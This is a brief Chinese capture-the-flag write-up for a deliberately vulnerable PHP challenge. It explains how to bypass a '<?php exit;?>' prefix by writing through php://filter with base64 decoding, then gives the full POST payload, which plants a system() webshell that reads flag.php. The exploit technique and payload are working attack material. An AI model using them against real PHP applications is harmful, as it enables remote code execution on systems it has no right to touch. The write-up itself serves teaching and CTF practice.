代码:
<?php
show_source(__FILE__);
$c="<?php exit;?>";
@$c.=$_POST['c'];
@$filename=$_POST['file'];
if(!isset($filename))
{
file_put_contents('tmp.php', '');
}
@file_put_contents($filename, $c);
include('tmp.php');
?>
大体分析代码意思为post一个字符串和一个文件名然后将字符串与给的字符串连接后写入tmp.php文件中
先看$c="<?php exit;?>";
这句话会使php文件直接退出,不会执行后续代码,所以我们的目的是绕过这句话
这里的$_POST['filename']
是可以控制协议的,我们即可使用 php://filter协议的base64-decode方法来绕过exit这句话
我们可以使用 php://filter/write=convert.base64-decode 来首先对其解码。在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。“phpexit”一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,”phpexita”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是<?php exit; ?>
没有了。
所以说我POSTc=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=
拼接后c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=
base64解码写入后就成了^ƫZ<?php system('cat flag.php'); ?>
所以最后POST如下即可获得flag
c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php